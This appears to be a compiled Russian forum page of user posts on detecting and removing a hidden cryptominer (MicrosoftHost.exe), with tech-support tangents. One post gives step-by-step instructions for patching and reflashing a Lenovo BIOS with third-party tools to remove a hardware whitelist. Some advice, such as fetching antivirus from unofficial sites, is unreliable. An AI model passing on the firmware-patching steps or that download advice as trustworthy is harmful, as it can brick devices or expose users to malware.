Microsofthost exe как удалить майнер
Перейти к содержимому

Microsofthost exe как удалить майнер

  • автор:

Как удалить microsofthost exe?

Подхватил майнер microsofthost exe он грузит проц на 50% когда выключен деспечер.
Если деспечер включен он его гасит через 1-2 минуты.
сбросил бы винду и нет проблем, так он и установщики винди гасит! хелпаните плзззззз

18 May 2020 в 20:56 #2

поставь линукс не парься с этим говном

а если серьезно, лол, с флешки загрузись в кудахтер, невозможно чтобы он пробрался в материнскую плату

img

18 May 2020 в 20:57 #3

Подхватил майнер microsofthost exe он грузит проц на 50% когда выключен деспечер.
Если деспечер включен он его гасит через 1-2 минуты.
сбросил бы винду и нет проблем, так он и установщики винди гасит! хелпаните плзззззз

Переустанови винду через «биос» и всё

18 May 2020 в 20:59 #4

Переустанови винду через «биос» и всё

У меня нету флешки с виндой прям щас, мне не хочется ждать до завтра и тд.

18 May 2020 в 21:06 #5

У меня нету флешки с виндой прям щас, мне не хочется ждать до завтра и тд.

18 May 2020 в 21:07 #6

Переустанови винду через «биос» и всё

Всё, я сделал всё как гений клоз тему

p.s- в программе system explorer нашел эти 2 жука
Потом нашел их деректорию и удалил (Если не удаляется «Файл уже открыт в..» то просто выключи её в system explorer и сразу же удали в папке (у тебя будет секунд 5) )

18 May 2020 в 21:07 #7

У меня нету флешки с виндой прям щас, мне не хочется ждать до завтра и тд.

А придется, такого рода майнеры практически не убиваемые, тоже ловил майнер, который маскировался и под системные процессы, аваст, двеб 360 не помогли, пришлось сносить винду.

18 May 2020 в 21:07 #8

А придется, такого рода майнеры практически не убиваемые, тоже ловил майнер, который маскировался и под системные процессы, аваст, двеб 360 не помогли, пришлось сносить винду.

18 May 2020 в 21:08 #9

А придется, такого рода майнеры практически не убиваемые, тоже ловил майнер, который маскировался и под системные процессы, аваст, двеб 360 не помогли, пришлось сносить винду.

UPD. Молодец, что справился без переустановки.

img

18 May 2020 в 21:13 #10

Всё, я сделал всё как гений клоз тему

p.s- в программе system explorer нашел эти 2 жука
Потом нашел их деректорию и удалил (Если не удаляется «Файл уже открыт в..» то просто выключи её в system explorer и сразу же удали в папке (у тебя будет секунд 5) )

У меня он возвращался через день-два

18 May 2020 в 21:14 #11

18 May 2020 в 21:15 #12

У меня 3-4 вируса палятся в диспетчере задач

Лень удалять уже год, просто вручную отключаю

img

18 May 2020 в 21:16 #13

Всё, я сделал всё как гений клоз тему

p.s- в программе system explorer нашел эти 2 жука
Потом нашел их деректорию и удалил (Если не удаляется «Файл уже открыт в..» то просто выключи её в system explorer и сразу же удали в папке (у тебя будет секунд 5) )

Видишь в чём прикол, если «У тебя будет секунд 5», это значит, что есть программа, которая её перезапускает => у тебя всё-равно в компе что-то из той серии висит, причём прячется хорошо и через время оно подкачает обратно майнер

Как удалить скрытый майнер ⁠ ⁠

Шутки шутками, но недавно столкнулся с такой ситуацией, когда после перезагрузки мой далеко не слабый комп вдруг в простое начал шуметь, температура процессора сразу поднялась до 70 градусов, как при игре. Открываю диспетчер задач, нагрузка резко падает, и всё становится как обычно. После закрытия диспетчера задач вдруг опять вентиляторы начинают шуметь, процесс начинает греться, открываю диспетчер задач, история повторяется. Если открыть Диспетчер задач и быстро отсортировать по нагрузке на процессор, то становится видно, что систему грузит программа MicrosoftHost.exe, которая находится в папке C:\ProgramData\WindowsTask\. Сразу первым делом пытаюсь зайти на сайт Dr.Web, чтобы скачать CureIt, но при переходе на сайт, меня вдруг перекидывает на страницу 8.8.8.8 вроде, или что-то такое было. Ну после этого я сразу понял, что подцепил какой-то вирус, если погуглить по названию процесса, то пишут, что это скрытый майнер, что объясняет почему там грузит систему одна программа. Притом, если скачать CureIt с телефона и запустить на компе, то CureIt находит вирус и удаляет, как будто бы. Но после перезагрузки всё остаётся также.

Решил написать, как почистить данный вирус, если знать что делать, то времени занимает немного, но поначалу я часа полтора сидел, пока всё почистил. Но некоторые моменты сделаны довольно хитро, если не очень хорошо ориентируешься в компах, то фиг почистишь этот вирус.

В общем для того, чтобы эту бяку полностью вычистить надо проделать следующие шаги.

Сразу говорю, я точно уже не помню, как назывались процессы и т.д., и это действия только для того типа скрытого майнера, который я поймал, у других могут отличаться. Но думаю сама последовательность действий может помочь.

1. Первым делом включаем отображение системных файлов, потому что папки с вирусом созданы как системные. И включаем отображение скрытых файлов. После всех действий можно обратно выключить. Нужно сделать как на скрине.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

2. После этого открываем файл hosts, который находится в папке C:\Windows\System32\drivers\etc\. Там будет видно много строк наподобие такой

Не помню точно, на какой адрес было перенаправление, но в файле будет куча подобных строк, с адресами всех популярных антивирусов. Удаляем все эти строки, и сохраняем файл hosts. Редактировать надо в режиме администратора, иначе прав не хватит.

3. Теперь надо найти все процессы вируса. Было несколько папок с вирусом, которые лежали в папке C:\ProgramData\. Чтобы наверняка их найти, открываем Диспетчер задач, и включаем отображение столбца Командная строка, и ищем процессы, которые находятся в папке C:\ProgramData\. Например, помню был один вирус, который назывался Realtek HD, он был со значком динамика, т.е. маскировался под звуковые драйвера, но запущен он был не из папки C:\Windows\System32\, а из папки C:\ProgramData\.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

Если нашли такой процесс, нажимаем правой кнопкой на процесс, далее Свойства, и открываем вкладку Цифровые подписи, у нормальных драйверов и процесс будут подписи, у вируса их не будет.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

Находим все такие процесс, которые лежат в папках внутри C:\ProgramData\ и останавливаем их, иначе не получится удалить папку, пока программа внутри неё запущена.

4. Далее заходим в папку C:\ProgramData\. Там видим кучу системных папок, среди которых будут папки с именами известных антивирусов (думаю из-за этого CureIt и не мог ничего сделать, потому что не было прав на папку), и папки, в которых лежат процессы, которые мы остановили. Сделать с этими папками мы ничего не можем, т.к. при попытке открыть или что-то сделать, нам пишет, что нет прав, даже если у нас права администратора.

С каждой папкой нам необходимо сделать следующие действия:

Нажимаем правой кнопкой -> Свойства -> Безопасность -> Дополнительно.

В открывшемся окне мы видим, что у этой папки нет владельца. Нажимаем Изменить и указываем свою учетную запись владельцем.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

И обязательно ставим галочку для дочерних объектов. После этого везде нажимаем ОК, чтобы сохранить. Теперь спокойно удаляем эту папку. Это нужно сделать со всеми папками с именами антивирусов и с процессами, которые мы ранее удалили. После этого надо в зайти в папки

C:\Program Files (x86)\

И точно также изменить владельца и удалить папки с именами антивирусов и различных программ от вирусов. Мне к 20 папке надоело проделывать все эти действия, поэтому можно сделать проще, через командную строку. Можно сразу в блокноте подготовить список всех папок и выполнить

takeown /F C:\ProgramData\Avira\ /R /D Y

takeown /F C:\ProgramData\DrWeb\ /R /D Y

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

5. Готово. После этого можно скачать тот же CureIt и всё проверить, также можно обратно скрыть системные файлы. И ещё этот майнер добавил свои папки в исключения Защитника Windows, на всякий случай надо тоже оттуда удалить эти папки.

1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.

2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.

Такие пакости всегда лучше убирать, запускаясь с флешки, никаких танцев с бубнами и прятками не будет. У большинства топовых антивирусников есть загрузочный образ для флешки со всем необходимым.

Иллюстрация к комментарию

Оо, у меня был точно такой же вирус! Изобретательный до жути.

Спасибо за шпаргалку, надеюсь, никому больше не пригодится 😅

Большой трафик, объём записи на ssd, загрузка процессора, службы windows — решение⁠ ⁠

Здорово браты.
Сейчас искал по своей проблеме решение. Нашёл, делюсь.

Значит начались эти события.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

с того, что мне как то подозрителен. да и надоел порядком, мигающий вечно диод работы \ обращения к винту.
Какое то время не придавал этому значение, т.к. башня стояла под столом, направлена диодом туда, где этот свет никому не мешает.
Недавно переставил её на стол и светомузыка стала ощутимой.
Полез смотреть в кристалдиск инфо, а там по винту, который под системой вот такая картина

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

для сравнения привожу диск с компа, который работает почти 24 на 7, хоть и в слабых задачах и почти без интернет трафика, но простите. разницу видите. Я ожидал большего.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

температура накопителя, надо сказать ,после нескольких минут после включения, достигала 50 градусов, при разрешённых 70, что так же, мне показалось ненормальным.
Путём нехитрых подсчётов выяснил, что трафик около 120 гигов в сутки. К слову сказать, данная модель имеет наработку на отказ 150 терабайт, и 1\5 часть (20%) уже израсходована. И это , всего лишь за пару лет эксплуатации.
Сильно активно компом не пользовался. Скачивание идёт на НЖМД) все хранилища на нжмд и тд. ССД только система. А игр кот наплакал. В основном 3 герои, цивилизация, ютубчик, да и те, довольно редко.
Не слишком ли круто?

Ок. Что может грузить винт? Пойду посмотрю в диспетчер задач.
А там

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

теперь решаю её:
Вкладка службы — выбираю Службу политики диагностики, правой кнопкой мыши и открыть службы

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

В приведённом ниже появившемся окне, отыскиваю паразита и обращаю внимание на то, что врубается автоматически

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

Предварительно снимаю задачу в «процессах» диспетчера задач, в текущем окне правой кнопкой мыши по нужной строчке,

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

Ну а в появившемся окошке нужно будет или отключить или сделать вручную.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

ну вот так.
Теперь диод винтов почти не мигает, сравнительно с тем, как это было до процедуры.
температура упала на 8 градусов.(сейчас 42 вместо 50, когда служба работала)
Думаю и трафик по записи теперь уменьшится.

Надеюсь, что помог(у) читателям, тем кто будет искать в будущем, избавиться от проблемы гашения ссд дисков и сохранения карманов, а также облегчить жизнь процессору.

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo]⁠ ⁠

Unauthorized wireless network card is plugged in power off and remove it.

Понадобилось заменить глючный и медленный Wi-Fi модуль на другой, более быстрый и стабильный. Кукарекал на эту тему несколько дней и в итоге разобрался.

Если есть такие же самураи как я, которые идут по этому пути, то дальше делаем на свой страх и риск.

Все, что здесь есть — собрал из говна и палок (из разных источников). Все делалось в системе Windows 11. Набор для действий (архив) прикрепил ниже.

Для дальнейших действий нужна флешка и напряженная задница.

Запускаем от имени «батьки» программу: BACKUP_Tools12_2.exe

На рабочем столе появляется results.rar

Вытягиваем оттуда что-то похожее на прошивку, у меня оно называлось: x32_bios-region_8.1.51.1476.bin

Заходим в папку Ezh20 в программу EzH2O.exe

В программе выбираем File — Load File.

Тип файлов меняем на ALL.

Выбираем файл, который был в results.rar — у меня нзывался x32_bios-region_8.1.51.1476.bin

Далее выйдет какая-то чепуха, машем головой и движемся в Components — Module. — Delete Existing Module

В окне, где GUID выбираем 11D378C2-B472-412F-AD87-1BE4CD8B33A6 и нажимаем Patch.

После улу-мулу процесса сохраняем это через Save as. что-то а-ля 3651F04.fd

Далее этот файл переименовываем в bios.bin (расширение с fd на bin).

Этот переименованный файл закидываем в папку Modified.

Затем заходим в rufus-2.1.exe

Записываем флешку как FreeDOS

Копируем содержимое из папки Modified в загрузочную флешку.

Перезагружаемся на флешку в режиме Legacy.

Выбираем русскую кодировку (если вдруг выйдет такое меню).

Как загорится С:> набираем «flash.bat» (без кавычек) жмем энтер.

Потом выходит всякая хрень и просит нажать энтер.

Потом просит нажать любую кнопку.

Далее перезагружаемся в БИОС, возвращаем нужные настройки и молимся, что все ок, но на самом деле помолиться нужно до того, как начали все это делать.

Теперь ссылки на источники, а также информация взята здесь, на авторство не претендую:

Возможно вышеописанное сработает и на других ноутах Lenovo. Конкретно у меня получилось на ноуте, описанном в заголовке.

Набор можно скачать здесь (раскидал на разные хостинги для выживаемости файлов):

Надеюсь кому-то поможет.

У кого получилось не сломать устройство, просьба отписаться в комментариях о своем аппарате для статистики и других ищущих решения данного вопроса.

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo] Windows, Компьютерная помощь, Компьютер, Ноутбук, Ремонт ноутбуков, Материнская плата, Ремонт техники, Электроника, Нужна помощь в ремонте, Электрика, Текст

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo] Windows, Компьютерная помощь, Компьютер, Ноутбук, Ремонт ноутбуков, Материнская плата, Ремонт техники, Электроника, Нужна помощь в ремонте, Электрика, Текст

Samsung выпустила фикс для «умирающих» накопителей 980 Pro — пациент будет жить⁠ ⁠

Samsung выпустила фикс для «умирающих» накопителей 980 Pro — пациент будет жить Компьютер, Windows, Компьютерная помощь, Samsung, SSD

В последнее время в сети появляется все больше жалоб на работу твердотельных накопителей Samsung. Недавно стало известно, что топовые 990 Pro деградируют в геометрической прогрессии. Правда, компания пока не признает проблему и не спешит решать ее в рамках гарантии. Похожие проблемы возникают и у прошлого поколения — только в этом случае Samsung сжалилась над клиентами и выпустила фикс.

Компания Puget Systems, специализирующаяся на сборке готовых ПК, и ее клиенты заметили, что твердотельные накопители Samsung 980 Pro работают со сбоями и являются причинами нестабильного поведения систем. Специалисты изучили проблему и отправили запрос в гарантийный отдел Samsung.

Выяснилось, что некоторые модели накопителей 980 Pro могут выйти из строя даже в начале своего жизненного цикла. По словам специалистов Puget, сбои чаще всего возникают на прошивке 3B2QGXA7, а также в версиях 980 Pro на 2 ТБ. Причина не уточняется, хотя пользователи Reddit предположили, что сбойные накопители слишком часто сообщают об ошибке 0E в S.M.A.R.T, из-за чего переполняется буфер, и устройство автоматически признается нерабочим.

Один из юзеров Reddit сообщил, что его модель на 2 ТБ вышла из строя с количеством ошибок около 32 000. При этом на новом накопителей накопилось уже более 2000 ошибок, так что он тоже скоро заблокируется и будет доступен только в режиме для чтения.

Впрочем, проблема оказалась софтовой — Samsung выпустила прошивку под номером 5B2QGXA7, которая устраняет шквал ошибок и переполнение счетчика сбоев. Стоит отметить, что прошивка рекомендована только для обновления SSD с номером ПО 3B2QGXA7. Устройства с прошивками 4B2QGXA7 и 5B2QGXA7 работают без нареканий. Обновить устройство можно с помощью фирменной утилиты Samsung Magician.

Ребята помогите с этим Ё\ ноутом Если можете -год Воз и ныне там⁠ ⁠

Ребята помогите с этим Ё\ ноутом Если можете -год Воз и ныне там Ноутбук, Без рук, Инвалид, ДЦП, Ремонт ноутбуков, Компьютерная помощь, Нужна помощь в ремонте, Windows, Компьютер, Электроника, Поломка, Видео, YouTube, Длиннопост, Помощь

Ребята помогите с этим Ё\ ноутом Если можете -год Воз и ныне там Ноутбук, Без рук, Инвалид, ДЦП, Ремонт ноутбуков, Компьютерная помощь, Нужна помощь в ремонте, Windows, Компьютер, Электроника, Поломка, Видео, YouTube, Длиннопост, Помощь

Ребята помогите с этим Ё\ ноутом Если можете -год Воз и ныне там Ноутбук, Без рук, Инвалид, ДЦП, Ремонт ноутбуков, Компьютерная помощь, Нужна помощь в ремонте, Windows, Компьютер, Электроника, Поломка, Видео, YouTube, Длиннопост, Помощь

Ребята помогите с этим Ё\ ноутом Если можете -год Воз и ныне там Ноутбук, Без рук, Инвалид, ДЦП, Ремонт ноутбуков, Компьютерная помощь, Нужна помощь в ремонте, Windows, Компьютер, Электроника, Поломка, Видео, YouTube, Длиннопост, Помощь

Эволюция как она есть⁠ ⁠

Порой так интересно наблюдать за эволюцией компьютерных вирусов. Вот так подхватишь какую-то дрянь, начинаешь разбираться и так увлекаешься этим делом, прямо чувствуешь себя Дроздовым. И ведь каждый раз найдешь что-то новенькое, уловки любой ценой защититься от всяких там юзверей.

Немного пояснения: в виду своей деятельности и лени пришлось раскурочать свою винду в решето. Понятно, что никаких антивирусов она и не видела никогда, да и тот же win defender отправлен в вечный сон реестром и гпо, открытая удаленка и вседоверяющий файервол. Никакой адекватной защиты в трёх словах.

Но и соответственно отлов вирусов, в частности майнеров, для меня не в новинку.

История: как-то заметил, что система стала виснуть на ровном месте. Лезем в диспетчер задач загрузка 100% и через секунду 10%. Классика.
Ну, думаю, приключение на 20 минут.
Лезу качать DrWeb cureit. Открываю сайт, браузер крашится. Ага. Знаем, проходили.
Лезем качать ProcessLasso. Любимый softportal, и тут нате переадресация на домен гугла.
Это дело тоже не в новинку: лезем искать файл hosts, и вот тут пошли интересности. А файла-то нету. Тут я списал на свою глупость, что вдруг где-то не там искал, все-равно к тому моменту cureit уже была скачана на ноут и перекинута на шару.
Ставим сканить систему, а параллельно находим ProcessLasso на другом сайте и начинаем выискивать процессы, которые как-то неадекватно кушают ресурсы. Таких оказалось несколько taskhost, который в диспетчере именовался COM Surrogate, audiodg и ещё парочка, которые позже cureit пачкой и почистил.
Что в этом оказалось интересного. При попытке открыть расположение файла происходил краш проводника и диспетчера задач, но во время фриза системы удалось углядеть путь до файла: C:/program data/realtek hd
Лезем туда напрямую, и. папки нет(видимость всех скрытых файлов папок включена). Не отчаиваемся, открываем консоль и пробуем искать оттуда. Все прекрасно видит, и даже позволяет залезть и полистать файлики.

По итогу cureit все почистил. И тут я вспомнил про hosts, полез туда же консолькой и о чудо, файлик-то на месте, открываем, удаляем тонну строк переадресации на 8.8.8.8, сохраняем, заменяем, радуемся жизни.

Позже узнал, что данный вирь сидит в новых репаках от "xatab'a". Что за люди. Ничего святого в них нет.

На этом я думал, что все и порешилось, пока на моих же глазах в систему удаленно не вошёл некий John — скрытая, как позже выяснилось, учетка с правами администратора. Но об этом уже в следующий раз, если кому-то будет это интересно.

Ответ на пост «Как удалить скрытый майнер»⁠ ⁠

1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.

2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.

Никогда не было и вдруг опять!⁠ ⁠

— Вы компьютеры ремонтируете?

— У нас такая проблема: скачали обновление для программы «Очень нужная программа для бухгалтерии», а при установке антивирус ругался, мы два раза пробовали, потом антивирус отключили, программа обновилась, комп перезагрузился и теперь не включается. Вы поможете?

Как избавиться от вируса-майнера?⁠ ⁠

Проблема заключается в том, что где-то раз в плюс-минус 5 минут комп чуток подвисает — идёт 100% загрузка проца и, скорее всего, видюхи, судя по работе её кулера. Ну, и естественно, что эти тормоза не приносят ничего приятного в пользование компом.

Непосредственно перед этим скачком автоматически закрывается диспетчер задач, если он был до этого открыт.

Я пробовал гуглить проблему и вышел на киберфорум, где нашёлся топик со схожими симптомами. Там говорят, что это майнер и советуют скачать AVZ и в нём выполнить некий скрипт. Далее проблема стала за тем, что я просто не смог запустить AVZ, так как после открытия программы она тут же автоматически закрывается. В итоге я запустил её и выполнил скрипт из безопасного режима, однако это вообще ничего не дало.

Тогда я попробовал зарегиться на форуме и создать тему уже непосредственно по своему случаю, но сразу после авторизации браузеры стали автоматически закрываться 🙁

Также пробовал использовать ESET и Avast, но с ними та же беда, что с AVZ: я просто не могу их установить — они закрываются.

Винду переустанавливал месяц назад — это тоже не помогло. Встроенные в винду брандмауэр и защитник у меня если что включены, настройки параметров выдачи уведомлений о вносимых в ОС изменениях тоже включены и ничего не показывают. Кстати, что характерно, загрузка проца и подвисания не такие жёсткие, когда отсутствует доступ к инету.

В общем, я не знаю, что делать и надеюсь, что мне тут подскажут решение этой проблемы.

Кажись, нашёл гадёныша:

В папке C — ProgramData — RealtekHD находится файл taskhostw, который запускает периодически процесс taskhost с описанием COM surrogate!

При попытке зайти в папку место хранения файла папка тут же закрывается.

Гугл выдаёт, что это таки майнер (ситуация вообще 1 в 1 как у меня)

Как я чинил компьютер⁠ ⁠

Небольшой офис, чуток компов. Один из них начинает неадекватно себя вести. Нет прав на эксплорер, нет прав на диспетчер задач, глюки в ворде, тормозит, работать невозможно. Хозяйка компа говорит, что началось всё после тыкания в него флешкой. Ну, ок, вирус, думаю. Просканировал поверхность диска на всякий, качнул в сторонке лив сиди от каспера и запустил скан.

Тут приходит вторая мадам и говорит, что ей край нужно чота отправить в госорганы при помощи ЭЦП, которая на той самой флешке. Предупреждаю, что на ней, скорее всего, вирус, и тыкать ею в комп (ноут) нельзя. Но она говорит ,что сёдня — это крайний день для этого. Ну, ок, я предупредил..

Пока я гляжу на результаты сканирования, приходит эта вторая мадам и говорит могильным голосом, что у неё всё то же самое. Я про себя удовлетворённо подумал, что это хорошо, это, значит, точно вирус, а ей сказал встать в очередь. Между тем я понимаю, что сканирование затягивается и предлагаю разойтись. Все кто куда, а я домой с её ноутом подмышкой.

Дома я начинаю вникать в происходящее. Первым делом пытаюсь запустить сканирование ноута. Не выходит ничо. Каспер лив сиди пишет, что диск смонтирован только для чтения, и лечение будет невозможно, а дрвеб лив сиди при загрузке просит ввести логин и пасс при старте дебиана (на нём его лив сиди основан). Что за логин — неизвестно. Неудача.

Начинаю уже понемногу психовать. Думаю, выну диск, подрублю к своему компу и просканирую. Открываю крышку ноута — диска нет. Понимаю, что диск ССД М2. Нужно разбирать дальше. Разобрал дальше, воткнул таки себе, прогнал вебом, каспером. Нету вирусов.

Продолжаю психовать и начинаю нервничать.

Собрал всё взад, включаю. Всё по-прежнему. Обратил внимание, что в винде нет пункта «выключение», есть только «выход». Нажал. Логично появилось окно для авторизации и с полем для ввода пароля. Понимаю, что пароля не знаю. Выяснил, что его не было вовсе. Понимаю, что не понимаю, что делать.

Сварганил флешку с утилиткой Dism, прибиваю пасс, перезагружаюсь..

Нашёл в инете, как убрать пасс при помощи реестра и дистриба виндовс. Проделываю это вот всё, но на этапе net user мне cmd сообщает, что запрос отклонён, нет прав доступа.

Ладно. Стартую снова c dism, активирую задизабленную учётку Администратор. Перезагружаюсь. Выбираю Админа. Хоба! Просит ввести пароль.

Какой в ж0пу пароль? Ладно. Убираю пароль у админа. Перезагружаюсь. Снова не помогло. Пароль при загрузке чудом возвращается.

Понимаю, что это уже вызов, ибо подобного не встречал. Всякое было, от cabanas и до шифровальщиков, но тогда хотя бы знал, кто передо мной. Тут же гранды антивирусописательства говорят, что вируса-то нет. Но, тем не менее, кто-то при загрузке что-то делает..

Тут звонит владелица ноута и просит его вернуть. Хочет отдать его другому челу, а меня умоляет заняться тем, первым компом, ибо в пнд он позарез будет нужен. Он основной, там 1С и прочая требуха. Ну, ок. Отвёз ноут, стал долбиться с компом. Напомню, поведение у них идентичное.

Ради статистики решил загрузиться в безопасном режиме. Внезапно, но комп загрузился. Хм. Стал тупо перебирать всё, что запускается при старте. Стал отключать всякие обновления адобе, драйверы принтеров, службы, названия которых я не знаю ) Внезапно натыкаюсь, что служба сбора статистики (дословно не помню) Аваст отключаться не хочет. Пишет, что отказано в доступе. Немного поколебавшись, сношу Аваст. Перезагружаюсь. Вытаращив глаза, понимаю, что всё работает. Звоню товарищу, которому отдали ноут, прошу снести Аваст. И у него тоже всё заработало.

Вишенка на торте: Аваст у них был Про. Платный.

Итого угробил я на это всё полторы суток практически.

Как подозреваю, флешка была ни при чём, просто авасты обновились одновременно. А флешка — совпадение.

Потом я её пихал куда ни попадя и проверял всем подряд — никаких последствий.

Что это было со стороны Аваста — так и не понял. Но был немножечко в ..недоумении.

Такая вот история выходного дня.

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть»⁠ ⁠

Для отслеживания подозрительных процессов очень удобен продвинутый менеджер процессов от самой майкрософт, называется ProcessExplorer.

Качается отсюда: https://docs.microsoft.com/en-us/sysinternals/downloads/proc. (сам сайт майкрософта, так что источник безопасен).

После запуска в меню выбираем эти два пункта:

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

И соглашаемся на условия конфиденциальности вирустотала.

Бинго, теперь у вас появится новая колонка в списке процессов, где отображается результат проверки на вирустотале, плюс проверка цифровой подписи запущенного файла. По нажатию на цифры сработки откроется страница вирустотала с отчётом.

ВАЖНО: сами файлы не передаются в вирустотал, он просто ищет там готовые результаты на файл с таким же хешем, так что особо мощный интернет не нужен! Если такого файла найденно не будет, то так и будет написано в данной колонке, и только по нажатию файл будет залит для проверки!

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

Так же, из полезных бонусов данной программы:

1) процессы отображаются в виде дерева, то есть вы видите, какими процессами они запущенны (на скрине показал кнопку активации данного режима)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

2) можно вывести графики загрузки (память, проц, диск, видяха итд) для каждого процесса в таблице (правой кнопкой на название колонок, там выбрать пункты с «history» — это и есть графики)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

3) Можно заменить этой программой встроенный менеджер процессов (для этого надо не просто открыть файл из архива, а сохранить его где-нибудь на компе)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

4) продвинутые графики загрузки системы, открываются по нажатию на главный график сверху окна программы

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

Надеюсь, кому-то эта информация будет полезна. Сам использую данный инструмент уже лет 8, родной виндовый менеджер уже кажется убогим.

Ответ на пост «Вирус майнер nt kernel system и как с ним бороться. ( Когда открываю диспетчер задач фпс повышается )»⁠ ⁠

Эхх. где ты раньше был.
Тоже напоролся на этот вирус, пришлось долго мучаться, но всё же смог его удалить.
Если кому поможет, то боролся я с ним так: Пока искал инфу про этот вирус, напоролся на этот сайт: https://it-tehnik.ru/virus/virus-close-browser.html С него я скачал старую версию Касперского. Т.к. сайт не официальный, то вирус его не закрывал. Позже в самом Касперском я обновил его до актуальной версии и просто провёл сканирование и последующую очистку компа.

А теперь немного про сам вирус — это майнер, который весьма хорошо прячется. Как и многие другие вирусы, как только включаешь диспетчер задач, он перестаёт нагружать комп. Но он сам выключает диспетчер задач раз в минуту-две (точное время не засекал). Мой Windows Defender (винда не лицензионная) его практически не засекал. Всё что он находил — один файл, который после удаления он находил снова. и снова. и снова. Можно скачать другой антивирус, но при входе на официальный сайт он просто закрывал браузер. Казалось бы, можно скачать с другого сайта, либо с внешнего носителя, но и тут может выйти облом — этот вирус может не дать открыть некоторые антивирусы, либо не дать им провести проверку.

Может мой способ не самый лучший, но я всё равно хочу его опубликовать, мало ли кому поможет.

Типичный фейл⁠ ⁠

Было это когда вирус баннер прям поголовно был, ну убирать его не было сложно. Предлагал клиентам ставить касперского лицензию. Покупал оптом, ну и по одному продавал)).

Поставил очередному клиенту и заверил что с антивирусной защитой баннер он не словит. Проходит неделя, звонит, пыхтит, недовольный аж прям. Верните деньги, я опять баннер поймал. Мой вердикт, везите. Привозит значит системный блок. Баннер сперва убираю , а он рядом стоит, смотрит и тыкает меня, вот видите, видите, деньги верните.

Ну не может так быть что бы антивирус пропустил. Смотрю на значок Касперского а он серый (значит защита выключена, да не просто, а вручную). Тааак, спрашиваю, почему Касперский выключен, вы его отключали? Тык, мык, я не, да ну может быть. а он мне не давал на сайт 18+ зайти. Я говорю, на котором и впаймали баннер? Глаза опустил. Не мой косяк, с вас 500р. за удаления баннера. Занавес.

Kaspersky: Начало⁠ ⁠

Kaspersky: Начало Антивирус, Майнеры, Комментарии на Пикабу

Ответ на пост «Как я скрытый майнер искал»⁠ ⁠

Есть такая классная встроенная в винду штука — монитор ресурсов. Там есть первая вкладка «Обзор». Так вот, ее «классность» в том, что в отличии от диспетчера задач она продолжает показывать завершенные процессы, статус у них «Прерван». У меня эта штука постоянно открыта. Если слышу, что ноут загудел — смотрю в первую очередь в прерванные процессы. Там, как правило тусят виндовые «бекграунд таск» хост процессы, которые винда быстро прибивает как только видит активность пользователя. Как собсно майнеры и делают. 😉

Ответ на пост «Как я скрытый майнер искал» Майнеры, Ответ на пост, Компьютерный вирус

Большинство антивирусов оказались подвержены атаке через символические ссылки⁠ ⁠

Большинство антивирусов оказались подвержены атаке через символические ссылки Антивирус, Mac Os, Windows, Linux, Длиннопост

Исследователи из компании RACK911 Labs обратили внимание на то, что почти все антивирусные пакеты для Windows, Linux и macOS были уязвимы для атак, манипулирующих состоянием гонки (race conditions) во время удаления файлов, в которых обнаружено вредоносное ПО.

